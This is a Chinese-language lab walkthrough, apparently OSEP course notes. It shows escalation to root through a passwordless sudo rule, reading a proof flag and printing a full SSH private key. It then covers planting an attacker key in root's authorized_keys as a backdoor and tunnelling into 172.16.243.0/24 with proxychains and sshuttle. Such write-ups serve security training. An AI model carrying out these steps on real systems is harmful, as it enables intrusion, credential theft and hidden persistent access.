从172.16.243.184上可以登录到172.16.243.197,注意切换用户到ansiblesvc
root@ansible06:/home/ansiblesvc# **su - ansiblesvc**
ansiblesvc@ansible06:~$ **ssh [email protected]**
Warning: Permanently added the ECDSA host key for IP address '172.16.243.197' to the list of known hosts.
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-52-generic x86_64)
* Documentation: <https://help.ubuntu.com>
* Management: <https://landscape.canonical.com>
* Support: <https://ubuntu.com/advantage>
0 updates can be installed immediately.
0 of these updates are security updates.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to <https://changelogs.ubuntu.com/meta-release-lts>. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Tue Oct 27 15:58:24 2020 from 172.16.50.184
ansiblesvc@appserver05:~$ ifconfig
Command 'ifconfig' not found, but can be installed with:
apt install net-tools
Please ask your administrator.
ansiblesvc@appserver05:~$ **ip addr show**
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:86:45:b3 brd ff:ff:ff:ff:ff:ff
inet **172.16.243.197**/24 brd 172.16.243.255 scope global noprefixroute ens160
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:fe86:45b3/64 scope link
valid_lft forever preferred_lft forever
ansiblesvc@appserver05:~$
ansiblesvc@appserver05:~$ **find / -name local.txt 2>/dev/null**
ansiblesvc@appserver05:~$ **sudo -l**
Matching Defaults entries for ansiblesvc on appserver05:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin
**User ansiblesvc may run the following commands on appserver05:
(ALL) NOPASSWD: ALL**
ansiblesvc@appserver05:~$ sudo su
root@appserver05:/home/ansiblesvc# find / -name proof.txt 2>/dev/null
/root/proof.txt
root@appserver05:/home/ansiblesvc# cat /root/proof.txt
f50e80a9fb44bfb4d440631e796f3f56
root@appserver05:/home/ansiblesvc# history
1 echo f50e80a9fb44bfb4d440631e796f3f56 > /root/proof.txt
2 passwd
3 exit
4 find / -name proof.txt 2>/dev/null
5 cat /root/proof.txt
6 history
root@ansible06:/home/ansiblesvc# ./run-nmap.sh -Pn -A -p- 172.16.243.197
Starting Nmap 7.91SVN ( <https://nmap.org> ) at 2022-08-03 23:03 EDT
Nmap scan report for 172.16.243.197
Host is up (0.00036s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 18:e4:25:fa:33:7b:b3:32:d7:96:3e:02:d7:6a:33:e2 (RSA)
| 256 8a:1f:a8:d1:6e:e2:d8:97:bc:81:11:99:00:0a:aa:77 (ECDSA)
|_ 256 5d:80:95:81:b6:03:09:f9:e1:5b:b3:1f:40:1c:1f:55 (ED25519)
MAC Address: 00:50:56:86:45:B3 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.36 ms 172.16.243.197
OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 15.56 seconds
root@ansible06:/home/ansiblesvc# ping dev.final.com
PING dev.final.com (172.16.243.192) 56(84) bytes of data.
^C64 bytes from 172.16.243.192: icmp_seq=1 ttl=128 time=0.305 ms
--- dev.final.com ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.305/0.305/0.305/0.000 ms
root@ansible06:/home/ansiblesvc# curl <http://172.16.243.192:8080>
Command 'curl' not found, but can be installed with:
apt install curl
root@ansible06:/home/ansiblesvc# ping dev.final.com
PING dev.final.com (172.16.243.192) 56(84) bytes of data.
64 bytes from 172.16.243.192: icmp_seq=1 ttl=128 time=0.282 ms
64 bytes from 172.16.243.192: icmp_seq=2 ttl=128 time=0.366 ms
64 bytes from 172.16.243.192: icmp_seq=3 ttl=128 time=0.398 ms
64 bytes from 172.16.243.192: icmp_seq=4 ttl=128 time=0.349 ms
^C
--- dev.final.com ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 12049ms
rtt min/avg/max/mdev = 0.282/0.348/0.398/0.042 ms
root@ansible06:/home/ansiblesvc/.ssh# cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
想用上面的私钥(从 ansible06 的 ~/.ssh/id_rsa 中读出;其末尾的 base64 注释字段解码后大致为 ansiblesvc@ansible06,即这是 ansible06 上 ansiblesvc 用户的密钥)来免密登录,发现不行。注意上面 L3 从 ansible06 以 ansiblesvc 身份 ssh 到 .197 时并没有出现密码提示,说明该密钥很可能在目标上是被接受的;在 Kali 上失败时建议用 ssh -vvv 排查:私钥文件权限是否为 0600、复制时有无改动换行/末尾空行、目标 authorized_keys 是否带有 from= 之类的来源限制,以及通过代理时指定的用户名是否正确。这里没有继续排查,后续自己生成一对公私钥,然后上传公钥来达到免密登录的目的。
这里有个问题,最开始把chisel放在192.168.243.181上,通过这个地址的socks5代理没法访问172.16.243.197的8080和8081端口。不过先别急着归咎于代理:上面对 172.16.243.197 的全端口 nmap 结果只有 22/tcp 开放,其余 65534 个端口均为 closed,所以 proxychains 访问 .197:8080/8081 超时与端口本身关闭是一致的;而前面 curl 尝试的 8080 服务其实在 dev.final.com(172.16.243.192)上。建议先确认 8080/8081 究竟属于哪台主机,再判断是不是代理链路的问题(下面 proxychains ssh 到 .197:22 成功,说明代理本身是通的)。
┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ proxychains4 curl <http://172.16.243.197:8081> 7 ⨯
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.197:8081 <--socket error or timeout!
curl: (7) Couldn't connect to server
┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ proxychains4 curl <http://172.16.243.197:8080> 7 ⨯
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.197:8080 <--socket error or timeout!
curl: (7) Couldn't connect to server
本地产生RSA公私钥(用于往目标 root 的 authorized_keys 里追加公钥,实现免密登录):注意这相当于在目标上植入了一个持久化的 root 后门,需在报告中记录并在测试结束后清理。另外第一次操作时把公钥误写到了 /root/authorized_keys 而不是 /root/.ssh/authorized_keys(下面划掉的两行,ls 输出里也能看到这个多余文件),应一并删除;sshd 只认 ~/.ssh/authorized_keys,且在 StrictModes 下 ~/.ssh 与 authorized_keys 不能被 group/others 可写,这里 .ssh 为 755、authorized_keys 为 600,符合要求。
┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ ssh-keygen -t rsa 130 ⨯
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): /home/kali/Documents/OSEP/ch6/197/id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/Documents/OSEP/ch6/197/id_rsa
Your public key has been saved in /home/kali/Documents/OSEP/ch6/197/id_rsa.pub
The key fingerprint is:
SHA256:TEDct16Iiwa5uRE19ckC+Xq6n7IISs2rS6Y7KAVI6ZY kali@kali
The key's randomart image is:
+---[RSA 3072]----+
| . o++. |
| o =o.o.. |
|+ . o ooo+o |
|oE + oo.o . |
|.. = oSo . |
| + + + o . |
|.=.o + o |
|O. .o.o . |
|==o.. o=o |
+----[SHA256]-----+
root@appserver05:~# mkdir .ssh
~~root@appserver05:~# echo 'ssh-rsa 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 kali@kali' >> authorized_keys
root@appserver05:~# chmod 0600 authorized_keys~~
root@appserver05:~# ls -alh
total 40K
drwx------ 5 root root 4.0K Aug 4 03:19 .
drwxr-xr-x 20 root root 4.0K Oct 26 2020 ..
-rw------- 1 root root 563 Aug 4 03:19 authorized_keys
-rw------- 1 root root 68 Nov 2 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Dec 5 2019 .bashrc
drwx------ 2 root root 4.0K Apr 23 2020 .cache
drwxr-xr-x 3 root root 4.0K Oct 27 2020 .local
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r--r-- 1 root root 33 Nov 2 2020 proof.txt
drwxr-xr-x 2 root root 4.0K Aug 4 03:19 .ssh
root@appserver05:~# **cd .ssh**
**root@appserver05:~/.ssh# echo 'ssh-rsa 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 kali@kali' >> authorized_keys
root@appserver05:~/.ssh# chmod 0600 authorized_keys**
root@appserver05:~/.ssh# ls -alh
total 12K
drwxr-xr-x 2 root root 4.0K Aug 4 03:19 .
drwx------ 5 root root 4.0K Aug 4 03:19 ..
-rw------- 1 root root 563 Aug 4 03:19 authorized_keys
root@appserver05:~/.ssh#
┌──(kali㉿kali)-[~/Documents/OSEP/ch6/197]
└─$ proxychains4 ssh -i id_rsa [email protected] 130 ⨯
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.197:22 ... OK
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-52-generic x86_64)
* Documentation: <https://help.ubuntu.com>
* Management: <https://landscape.canonical.com>
* Support: <https://ubuntu.com/advantage>
0 updates can be installed immediately.
0 of these updates are security updates.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to <https://changelogs.ubuntu.com/meta-release-lts>. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2025.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
root@appserver05:~#
sshuttle全局代理(把本机到 172.16.243.0/24 的 TCP 流量经由 .197 上的 root ssh 会话转发,ssh 本身仍通过 proxychains 的 socks5 链路到达 .197):proxychains4 sshuttle -v -e "ssh -i id_rsa" -r [email protected] 172.16.243.0/24。从下面的输出可见 nat 方式只转发 TCP,UDP 和 DNS 均为 off,因此对该网段的主机名解析仍走本机;最后关于 dbus-org.freedesktop.resolve1.service 的 "Failed to flush caches" 报错只是本地刷新解析缓存失败,看起来不影响隧道本身。
┌──(kali㉿kali)-[~/Documents/OSEP/ch6/197]
└─$ **proxychains4 sshuttle -v -e "ssh -i id_rsa" -r [email protected] 172.16.243.0/24**
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting sshuttle proxy (version 1.1.0).
c : Starting firewall manager with command: ['/usr/bin/env', 'PYTHONPATH=/usr/lib/python3/dist-packages', '/usr/bin/sudo', '-p', '[local sudo] Password: ', '/usr/bin/python3', '/usr/bin/sshuttle', '-v', '--method', 'auto', '--firewall']
[proxychains] DLL init: proxychains-ng 4.16
[local sudo] Password:
fw: Starting firewall with Python version 3.10.5
fw: ready method name nat.
c : IPv6 enabled: Using default IPv6 listen address ::1
c : Method: nat
c : IPv4: on
c : IPv6: on
c : UDP : off (not available with nat method)
c : DNS : off (available)
c : User: off (available)
c : Subnets to forward through remote host (type, IP, cidr mask width, startPort, endPort):
c : (<AddressFamily.AF_INET: 2>, '172.16.243.0', 24, 0, 0)
c : Subnets to exclude from forwarding:
c : (<AddressFamily.AF_INET: 2>, '127.0.0.1', 32, 0, 0)
c : (<AddressFamily.AF_INET6: 10>, '::1', 128, 0, 0)
c : TCP redirector listening on ('::1', 12300, 0, 0).
c : TCP redirector listening on ('127.0.0.1', 12300).
c : Starting client with Python version 3.10.5
c : Connecting to server...
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.197:22 ... OK
s: Running server on remote host with /usr/bin/python3 (version 3.8.5)
s: latency control setting = True
s: auto-nets:False
c : Connected to server.
fw: setting up.
fw: ip6tables -w -t nat -N sshuttle-12300
fw: ip6tables -w -t nat -F sshuttle-12300
fw: ip6tables -w -t nat -I OUTPUT 1 -j sshuttle-12300
fw: ip6tables -w -t nat -I PREROUTING 1 -j sshuttle-12300
fw: ip6tables -w -t nat -A sshuttle-12300 -j RETURN -m addrtype --dst-type LOCAL
fw: ip6tables -w -t nat -A sshuttle-12300 -j RETURN --dest ::1/128 -p tcp
fw: iptables -w -t nat -N sshuttle-12300
fw: iptables -w -t nat -F sshuttle-12300
fw: iptables -w -t nat -I OUTPUT 1 -j sshuttle-12300
fw: iptables -w -t nat -I PREROUTING 1 -j sshuttle-12300
fw: iptables -w -t nat -A sshuttle-12300 -j RETURN -m addrtype --dst-type LOCAL
fw: iptables -w -t nat -A sshuttle-12300 -j RETURN --dest 127.0.0.1/32 -p tcp
fw: iptables -w -t nat -A sshuttle-12300 -j REDIRECT --dest 172.16.243.0/24 -p tcp --to-ports 12300
Failed to flush caches: Unit dbus-org.freedesktop.resolve1.service not found.
fw: Received non-zero return code 1 when flushing DNS resolver cache.